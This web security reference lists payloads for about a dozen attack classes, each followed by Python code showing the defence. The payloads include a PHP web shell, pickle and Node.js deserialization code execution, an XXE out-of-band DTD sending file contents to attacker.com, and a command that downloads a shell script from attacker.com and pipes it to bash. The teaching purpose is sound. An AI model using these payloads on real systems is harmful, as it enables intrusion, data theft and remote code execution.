Comprehensive collection of web application security vulnerabilities and attack vectors
Educational Purpose Only
These techniques are for authorized security testing only. Unauthorized access is illegal.
Common authentication bypass techniques

Classic SQL injection to bypass login (the quote closes the username literal, OR '1'='1' makes the WHERE clause always true, and the comment marker discards the password check; MySQL needs a space after the --):
admin' OR '1'='1' --

NoSQL injection for MongoDB authentication bypass (sent as the JSON value of the password field; $ne matches every document whose password is not null, so the first user is returned):
{"$ne": null}

Modify the JWT header to bypass signature verification (only works against verifiers that take the algorithm from the token; the third segment is left empty):
{"alg":"none","typ":"JWT"}

Force the victim to use a known session ID (session fixation; succeeds only if the application does not regenerate the session ID on login):
Set-Cookie: PHPSESSID=attacker_session_id
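The SQL injection login bypass above, run against a string-concatenated query and against the parameterised form that defeats it. This is an added example, not code from the original page; the users table and its single row are constructed for the demonstration and SQLite stands in for the real database.

```python
"""Added example: `admin' OR '1'='1' --` against a concatenated login query
versus a parameterised one. The user table is constructed; SQLite in memory."""
import sqlite3

PAYLOAD = "admin' OR '1'='1' --"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # constructed test row
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # String formatting lets the attacker's quote and comment become SQL syntax:
    # ... WHERE username = 'admin' OR '1'='1' --' AND password = '...'
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders bind the values as data; the quote and -- stay inside the
    # string literal and never reach the SQL parser as syntax.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, "wrong"))   # True
    print("parameterised:", login_safe(db, PAYLOAD, "wrong"))      # False
```

The same payload is accepted by the concatenated query and rejected by the parameterised one; no input filtering is involved, which is why binding beats blocklisting quotes.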
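The alg:none header trick above, shown end to end: a verifier that trusts the algorithm named in the token accepts a forged payload with an empty signature, while a verifier that pins HS256 rejects it. Added example using only the standard library, not code from the page; the HMAC key and claims are constructed.

```python
"""Added example: forging an alg=none JWT and the difference between a verifier
that honours the token's alg and one that pins it. Key and claims are constructed."""
import base64
import hashlib
import hmac
import json

SECRET = b"server-side-hmac-key"  # constructed


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(payload: dict) -> str:
    header = b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url(json.dumps(payload).encode())
    sig = hmac.new(SECRET, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"


def forge_alg_none(payload: dict) -> str:
    # Attacker side: new header {"alg":"none"}, chosen claims, empty signature.
    header = b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    return f"{header}.{b64url(json.dumps(payload).encode())}."


def _check_hmac(header_b64: str, body_b64: str, sig_b64: str) -> None:
    expected = hmac.new(SECRET, f"{header_b64}.{body_b64}".encode(),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        raise ValueError("bad signature")


def verify_trusting_header(token: str) -> dict:
    # The bug: the token decides which algorithm verifies it.
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "none":
        _check_hmac(header_b64, body_b64, sig_b64)
    return json.loads(b64url_decode(body_b64))


def verify_pinned(token: str) -> dict:
    # The fix: the verifier fixes the algorithm and rejects anything else.
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    _check_hmac(header_b64, body_b64, sig_b64)
    return json.loads(b64url_decode(body_b64))


def accepted(verifier, token: str) -> bool:
    try:
        verifier(token)
        return True
    except ValueError:
        return False
```

Real libraries that were vulnerable to this accepted the token in exactly the way verify_trusting_header does; the usual fix is an explicit allowlist of algorithms passed to the decode call.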
Path traversal and file inclusion techniques

Read sensitive files using relative paths (extra ../ segments are harmless once the filesystem root is reached, so over-counting is the norm):
../../../../../../etc/passwd

Bypass filters using URL encoding (%2F becomes / after a filter that looked for "../" has already run):
..%2F..%2F..%2Fetc%2Fpasswd

Double encode to bypass a WAF (%252F decodes to %2F at the WAF and to / at the application):
..%252F..%252F..%252Fetc%252Fpasswd

Null byte injection to bypass extension checks (only effective where the runtime truncates strings at NUL, e.g. PHP before 5.3.4):
../../etc/passwd%00.jpg

Windows path traversal (backslash separators; the live SAM hive is locked by the OS, so a successful traversal can still return an access error):
..\..\..\windows\system32\config\sam
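A path check that holds against every payload in this section: decode twice, reject NUL, normalise backslashes, resolve the real path and require it to stay under the base directory. Added example, not the page's code; the base directory /var/www/uploads is an assumed value.

```python
"""Added example: canonicalise-then-contain check for user-supplied file paths.
BASE is an assumed upload root."""
import os
from urllib.parse import unquote

BASE = os.path.realpath("/var/www/uploads")  # assumed document root


def resolve_upload_path(user_path: str) -> str:
    """Return the absolute path to open, or raise ValueError."""
    # Decode twice so double-encoded %252F is seen as the slash it will become.
    # (Deliberately conservative: a legitimate name containing '%' is decoded too.)
    decoded = unquote(unquote(user_path))
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    # Treat backslashes as separators so Windows-style traversal is caught too.
    decoded = decoded.replace("\\", "/")
    candidate = os.path.realpath(os.path.join(BASE, decoded.lstrip("/")))
    # realpath collapses every ../ (and follows symlinks); the result must
    # still be inside BASE.
    if os.path.commonpath([BASE, candidate]) != BASE:
        raise ValueError("path escapes base directory")
    return candidate


def is_rejected(user_path: str) -> bool:
    try:
        resolve_upload_path(user_path)
        return False
    except ValueError:
        return True
```

The check works on the resolved path rather than on the input string, so it does not matter how many encodings or separator styles the attacker layers on.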
Malicious file upload bypasses

Simple PHP web shell:
<?php system($_GET["cmd"]); ?>

Bypass an extension whitelist (relies on a handler that executes .php wherever it appears in the name, e.g. a permissive Apache AddHandler rule):
shell.php.jpg

Null byte in the filename (same NUL-truncation requirement as in the traversal section):
shell.php%00.jpg

Add magic bytes to bypass MIME checks (the GIF89a header satisfies content sniffing; PHP ignores the leading bytes and executes the tag):
GIF89a<?php system($_GET["cmd"]); ?>

ASP.NET page (as written this only echoes the cmd parameter back; it proves that uploaded .aspx files are processed by the server but does not execute commands):
<%@ Page Language="C#" %><% Response.Write(Request.QueryString["cmd"]); %>
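Why the "GIF89a" trick works, and what a stricter check looks like: the weak check accepts any allowed extension anywhere in the name plus any image magic, so shell.php.jpg with a GIF header passes; the strict check keys on the last extension, requires the magic bytes to match that extension, refuses NUL and refuses script markers in the body. Added example, not the page's code; the MIME table and sample upload bytes are constructed.

```python
"""Added example: weak versus strict upload validation for the payloads in this
section. Magic table and sample bytes are constructed."""
import os
import posixpath

MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<%", b"<script")


def naive_check(filename: str, data: bytes) -> bool:
    # Typical weak check: some allowed extension appears somewhere in the
    # name, and the first bytes look like some image.
    ok_ext = any(ext in filename.lower() for ext in (".jpg", ".jpeg", ".png", ".gif"))
    ok_magic = any(data.startswith(m) for m in MAGIC.values())
    return ok_ext and ok_magic


def strict_check(filename: str, data: bytes) -> bool:
    if "\x00" in filename or "%00" in filename:
        return False
    base = posixpath.basename(filename.replace("\\", "/"))
    name, _, ext = base.rpartition(".")
    ext = ext.lower()
    if not name or ext not in MAGIC:          # the LAST extension decides
        return False
    if not data.startswith(MAGIC[ext]):       # magic must match that extension
        return False
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False                          # polyglot image/script
    return True


def stored_name(ext: str) -> str:
    # Assumed storage convention: server-generated name, never the client's,
    # written outside the web root.
    return f"{os.urandom(8).hex()}.{ext}"
```

The marker scan is a heuristic; the robust fix is to re-encode the image with an image library and serve it from a non-executing location, which strips embedded PHP regardless of how it was hidden.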
SSRF payloads and bypass techniques

Access internal services:
http://127.0.0.1:8080/admin

Alternative localhost representations (0.0.0.0, the IPv6 loopback, and decimal or octal forms such as 2130706433 or 0177.0.0.1 all defeat string-based blocklists):
http://0.0.0.0/ or http://[::1]/

AWS metadata endpoint (IMDSv1; IMDSv2 requires a PUT to /latest/api/token first, which most SSRF vectors cannot issue):
http://169.254.169.254/latest/meta-data/

Bypass a blocklist with URL tricks (everything before @ is userinfo, so the request goes to 127.0.0.1 while a filter that keys on the first host-looking token sees example.com; the reverse order sends the request to example.com):
http://example.com@127.0.0.1

DNS rebinding attack (the attacker's name resolves to a public address when the filter checks it and to an internal one when the request is made; mitigate by resolving once and connecting to the address that was checked):
http://rebind.example.com
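A validator that covers the payloads in this section: it parses the URL the way the HTTP client will (so the @ trick yields the real host), rejects loopback, link-local, unspecified and private addresses, and returns the single resolved address the caller must connect to, which is the resolve-once rule that defeats DNS rebinding. Added example, not the page's code; the resolver hook and the addresses in the usage are constructed.

```python
"""Added example: SSRF destination validation with resolve-once pinning.
The resolver parameter exists so the check can be exercised without DNS."""
import ipaddress
import socket
from urllib.parse import urlsplit


def request_host(url: str) -> str:
    # urlsplit follows RFC 3986: text before '@' is userinfo, not the host.
    return urlsplit(url).hostname or ""


def naive_blocklist(url: str) -> bool:
    # The kind of filter the @ trick beats: take the text after "://" up to
    # the first '/', '@' or ':' and compare it with a list of bad hosts.
    rest = url.split("://", 1)[-1]
    first = rest.split("/", 1)[0].split("@", 1)[0].split(":", 1)[0]
    return first in {"127.0.0.1", "localhost", "169.254.169.254"}


def address_is_internal(ip: str) -> bool:
    a = ipaddress.ip_address(ip)
    return (a.is_private or a.is_loopback or a.is_link_local
            or a.is_unspecified or a.is_reserved or a.is_multicast)


def default_resolver(host: str) -> list:
    return [info[4][0] for info in socket.getaddrinfo(host, None)]


def validate_outbound(url: str, resolver=default_resolver) -> str:
    """Return the IP to connect to, or raise ValueError."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("scheme not allowed")
    host = parts.hostname
    if not host:
        raise ValueError("no host")
    try:
        candidates = [str(ipaddress.ip_address(host))]  # literal IP: no DNS
    except ValueError:
        candidates = resolver(host)
    if not candidates:
        raise ValueError("unresolvable host")
    for ip in candidates:
        if address_is_internal(ip):
            raise ValueError(f"{host} resolves to internal address {ip}")
    # Connect to this address, not to the hostname: a second lookup is where
    # rebinding would swap in an internal answer.
    return candidates[0]


def is_blocked(url: str, resolver=default_resolver) -> bool:
    try:
        validate_outbound(url, resolver)
        return False
    except ValueError:
        return True
```

The HTTP client must then be told to connect to the returned IP (with the original hostname in the Host header and TLS SNI), and redirects must be re-validated with the same function, since a 302 to an internal address is the other common route around these checks.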
XXE injection payloads

Read local files via XXE:
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>

Exfiltrate data out-of-band (this is the body of the external DTD fetched by the last payload below; %file; is expanded into the URL of a second request the parser makes to the attacker's server, and &#x25; is needed because a literal % inside an entity value would be parsed as a reference; a multi-line file such as /etc/passwd produces an invalid URL, so single-line targets like /etc/hostname work best):
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfil;

XXE through SVG upload (the DOCTYPE must precede the root element; the file content is only visible if the server renders the image or returns the parsed text):
<?xml version="1.0"?>
<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><text>&xxe;</text></svg>

External DTD for XXE (loads the attacker-hosted DTD that carries the parameter-entity declarations above):
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]>
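The defence all four payloads share a weakness to: a parser that refuses any DOCTYPE, entity declaration or external entity reference before it does anything else. Added example built on the standard-library expat bindings (the same approach the defusedxml package takes), not code from the page; the sample documents in the usage are constructed.

```python
"""Added example: expat parser that aborts on DTD constructs, so none of the
XXE payloads in this section can declare or resolve an entity."""
import xml.parsers.expat


class DTDForbidden(ValueError):
    pass


def parse_without_dtd(xml_bytes: bytes) -> dict:
    """Parse and return {'elements': [...], 'text': '...'}; raise on any DTD."""
    p = xml.parsers.expat.ParserCreate()
    seen = {"elements": [], "text": ""}

    def forbid_doctype(name, sysid, pubid, has_internal_subset):
        # Fires for both inline DTDs and external DTD references.
        raise DTDForbidden(f"DOCTYPE {name!r} rejected")

    def forbid_entity(*args):
        raise DTDForbidden("entity declaration rejected")

    def forbid_external(context, base, system_id, public_id):
        raise DTDForbidden(f"external entity {system_id!r} rejected")

    p.StartDoctypeDeclHandler = forbid_doctype
    p.EntityDeclHandler = forbid_entity
    p.ExternalEntityRefHandler = forbid_external
    p.StartElementHandler = lambda name, attrs: seen["elements"].append(name)
    p.CharacterDataHandler = lambda data: seen.__setitem__("text", seen["text"] + data)
    p.Parse(xml_bytes, True)
    return seen


def is_safe(xml_bytes: bytes) -> bool:
    """True if the document parsed with no DTD constructs and no syntax errors."""
    try:
        parse_without_dtd(xml_bytes)
        return True
    except (DTDForbidden, xml.parsers.expat.ExpatError):
        return False
```

Rejecting the DOCTYPE outright is simpler and safer than trying to allow "harmless" internal entities, and it also shuts down billion-laughs style expansion, which needs no external reference at all.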
OS command injection payloads

Chain commands with a semicolon:
127.0.0.1; cat /etc/passwd

Pipe output to a command:
127.0.0.1 | whoami

Execute only if the previous command succeeds:
127.0.0.1 && id

Backtick command substitution (blind: the command output becomes a DNS label, so it shows up in the attacker's resolver logs even when nothing is reflected in the response):
ping -c 1 `whoami`.attacker.com

Download and execute a script (the $( ) substitution is evaluated before the outer command runs, so it works even if that command then fails):
$(curl attacker.com/shell.sh | bash)
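What the shell sees versus what an argv list sees, for the ping example this section is built around: the injected string tokenises into two commands when handed to a shell, while an allowlisted target placed in an argument list is inert. Added example, not the page's code; the hostname pattern and the ping invocation are assumptions about the target application.

```python
"""Added example: target validation and argv construction for a ping wrapper,
beside the shell tokenisation that makes the injected payloads work."""
import ipaddress
import re
import shlex
import subprocess

# assumed: a plain hostname or IP literal is the only legitimate input
HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def validate_target(target: str) -> str:
    """Return the target if it is an IP literal or plain hostname, else raise."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    # Shell metacharacters (; | & ` $ ( ) and whitespace) are outside the class,
    # and a leading '-' would be parsed by ping as an option.
    if HOST_RE.fullmatch(target) and not target.startswith("-"):
        return target
    raise ValueError(f"invalid target: {target!r}")


def is_valid_target(target: str) -> bool:
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def shell_words(command_line: str) -> list:
    # Tokenise the way a POSIX shell would, keeping ; | & as their own tokens.
    return list(shlex.shlex(command_line, punctuation_chars=True))


def vulnerable_command(target: str) -> str:
    # The injectable pattern: one string for `sh -c`.
    return f"ping -c 1 {target}"


def safe_argv(target: str) -> list:
    # One element per argument, no shell: metacharacters are just bytes.
    return ["ping", "-c", "1", validate_target(target)]


def run(target: str) -> subprocess.CompletedProcess:
    return subprocess.run(safe_argv(target), capture_output=True, text=True, timeout=5)
```

Passing a list to subprocess.run without shell=True is the fix; the validator is defence in depth so that option injection (a target starting with "-") is also caught.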
Deserialization attack payloads

Python pickle RCE (protocol 0 opcode stream: GLOBAL imports os.system, the string 'id' is pushed, REDUCE calls it; \n stands for literal newlines in the bytes):
cos\nsystem\n(S'id'\ntR.

Java serialized stream header (base64 of the magic bytes AC ED 00 05 followed by the class descriptor for java.util.PriorityQueue; a working gadget chain, such as those generated by ysoserial, is much longer and continues from this prefix):
rO0ABXNyABdqYXZhLnV0aWwuUHJpb3JpdHlRdWV1ZQ==

PHP object injection (serialized-object syntax; stdClass has no magic methods, so a real payload targets a class in the application or a library whose __wakeup or __destruct acts on the controlled property):
O:8:"stdClass":1:{s:4:"code";s:10:"phpinfo();";}

Node.js deserialization RCE (node-serialize: the _$$ND_FUNC$$_ prefix marks a function body that is rebuilt with eval, and the trailing () turns it into an IIFE so it runs during unserialize()):
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('calc');}()"}
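The pickle payload above, inspected without executing it, and an unpickler that refuses it: pickletools walks the opcode stream and reports the GLOBAL target, and a restricted Unpickler.find_class rejects anything not on an allowlist before os.system is ever imported. Added example, not the page's code; the allowlist is an assumed policy for the demonstration.

```python
"""Added example: static inspection of the pickle payload and a restricted
unpickler. ALLOWED is an assumed policy."""
import io
import pickle
import pickletools

PAYLOAD = b"cos\nsystem\n(S'id'\ntR."   # the page's payload, newlines made literal


def globals_referenced(data: bytes) -> list:
    """List every module.name a protocol-0..3 pickle would import, without running it.
    (Protocol 4 STACK_GLOBAL takes its names from the stack and needs a deeper walk.)"""
    found = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            found.append(arg.replace(" ", "."))
    return found


class RestrictedUnpickler(pickle.Unpickler):
    ALLOWED = {("builtins", "dict"), ("builtins", "list"), ("builtins", "set")}

    def find_class(self, module, name):
        # Called for GLOBAL/STACK_GLOBAL before the object is used, so the
        # import itself is what gets refused.
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def load_is_blocked(data: bytes) -> bool:
    try:
        safe_loads(data)
        return False
    except pickle.UnpicklingError:
        return True


def roundtrip_benign() -> dict:
    # Plain containers need no find_class call and still load.
    return safe_loads(pickle.dumps({"a": [1, 2]}))
```

A restricted unpickler is the documented hardening in the pickle module itself; the stronger answer is to not accept pickle from untrusted sources at all and use a data-only format.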
LDAP injection payloads

Bypass LDAP authentication (username field of a filter shaped like (&(uid=USER)(userPassword=PASS)); closes the uid clause and appends an always-true OR):
*)(uid=*))(|(uid=*

LDAP OR injection (username field; injects an OR clause, with the effect depending on how the application assembles the filter):
admin)(|(password=*)

Enumerate LDAP objects (wildcard search that matches every entry):
*)(objectClass=*
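RFC 4515 escaping applied to the payloads above, with a small structural check that shows the difference: the unescaped login filter splits into two top-level filters, the escaped one stays a single filter in which the parentheses and wildcard are literal characters. Added example, not the page's code; the login filter shape is an assumption.

```python
"""Added example: LDAP filter value escaping (RFC 4515) and a check that an
assembled filter still has exactly one top-level expression."""


def escape_ldap_filter_value(value: str) -> str:
    """Escape the characters that have meaning inside an LDAP search filter."""
    out = []
    for ch in value:
        if ch in "*()\\" or ch == "\x00":
            out.append("\\%02x" % ord(ch))   # e.g. '*' -> '\2a', ')' -> '\29'
        else:
            out.append(ch)
    return "".join(out)


def login_filter_vulnerable(user: str, password: str) -> str:
    # assumed filter shape; values pasted in unescaped
    return f"(&(uid={user})(userPassword={password}))"


def login_filter_safe(user: str, password: str) -> str:
    return "(&(uid=%s)(userPassword=%s))" % (
        escape_ldap_filter_value(user), escape_ldap_filter_value(password))


def top_level_filters(filter_str: str) -> int:
    """Count how many complete, balanced filters appear at depth zero."""
    depth = complete = 0
    for ch in filter_str:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                complete += 1
    return complete
```

Most LDAP client libraries expose an escape function equivalent to this one (ldap3's escape_filter_chars, for instance); the point of the structural count is to see why the raw payload is accepted by a server that simply stops reading after the first complete filter.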
Server-Side Template Injection (SSTI)

Python Jinja2 template injection (396 is whatever index subprocess.Popen happens to have in object.__subclasses__() on the target; it changes with the Python version and the modules loaded, so enumerate the list first):
{{ ''.__class__.__mro__[1].__subclasses__()[396]('cat /etc/passwd',shell=True,stdout=-1).communicate() }}

PHP Twig template injection (Twig 1.x only; registerUndefinedFilterCallback was removed in Twig 2):
{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}

Java FreeMarker injection (the ?new built-in instantiates a TemplateModel class; the default class resolver allows it, while the SAFER_RESOLVER setting blocks Execute):
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }

Node.js Handlebars injection (the opening of the well-known prototype-walk payload; the full version continues with further {{#with}} blocks that reach the Function constructor, and is truncated here):
{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{/with}}{{/with}}{{/with}}
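Why the hard-coded [396] in the Jinja2 payload is unreliable: the same attribute walk the payload performs, run on the local interpreter, returns whatever index subprocess.Popen has here, which is rarely the number on the cheat sheet. Added example, not the page's code, using nothing but the attribute chain from the payload itself.

```python
"""Added example: resolve the object.__subclasses__() index that the Jinja2
payload hard-codes as 396, to show it is interpreter-specific."""
import subprocess


def object_subclasses() -> list:
    # Same walk as the payload: str -> its MRO -> object -> all subclasses.
    return "".__class__.__mro__[1].__subclasses__()


def find_subclass_index(qualified_name: str) -> int:
    """Index of the class whose module.qualname matches, or -1 if not loaded."""
    for i, cls in enumerate(object_subclasses()):
        if f"{cls.__module__}.{cls.__qualname__}" == qualified_name:
            return i
    return -1


def popen_index() -> int:
    # subprocess is imported above, so Popen is guaranteed to be present.
    return find_subclass_index("subprocess.Popen")


def index_is_stable_at(n: int) -> bool:
    """Would the cheat-sheet index point at Popen on this interpreter?"""
    subs = object_subclasses()
    return 0 <= n < len(subs) and subs[n] is subprocess.Popen


if __name__ == "__main__":
    print("subprocess.Popen is at index", popen_index())
    print("[396] would hit Popen here:", index_is_stable_at(396))
```

The defensive takeaway is the same regardless of index: user input must never be compiled as a template (Template(user_input)); it belongs in the render context (template.render(name=user_input)), and Jinja2's SandboxedEnvironment should back that up.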
Open redirect payloads

Direct redirect parameter:
?redirect=https://evil.com

Protocol-relative URL (the browser resolves //evil.com against the current scheme, so a check that only rejects values starting with http fails):
?url=//evil.com

Encoded redirect (decodes to //evil.com after the framework's URL decoding):
?next=%2F%2Fevil.com

JavaScript protocol redirect (only fires when the value is written into a link or assigned to location client-side; browsers ignore javascript: in a server-side Location header):
?redirect=javascript:alert(document.domain)
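A redirect-target check that rejects all four payloads above while still allowing local paths and the application's own host: absolute URLs are accepted only for an allowlisted host, protocol-relative and backslash variants are refused, and anything with a scheme that is not http or https (javascript: included) falls back to the default. Added example, not the page's code; the allowed host is an assumption.

```python
"""Added example: open-redirect target validation. ALLOWED_HOSTS is assumed."""
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"app.example.com"}  # assumed first-party host


def safe_redirect_target(value: str, default: str = "/") -> str:
    """Return a redirect target that stays on our site, or the default."""
    decoded = unquote(value)          # %2F%2Fevil.com -> //evil.com
    parts = urlsplit(decoded)
    if parts.scheme or parts.netloc:
        # Absolute (https://evil.com) or protocol-relative (//evil.com):
        # allowed only for our own host over http(s). javascript: has a scheme
        # and no allowed host, so it lands here and is refused.
        if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
            return decoded
        return default
    # Relative target: must be a single-slash path. Browsers treat "/\" like
    # "//", so that spelling is refused as well.
    if (not decoded.startswith("/") or decoded.startswith("//")
            or decoded.startswith("/\\")):
        return default
    return decoded
```

Returning a default rather than raising keeps the login flow working when a link has been tampered with, which is usually what the product wants; the important property is that the attacker cannot choose the destination.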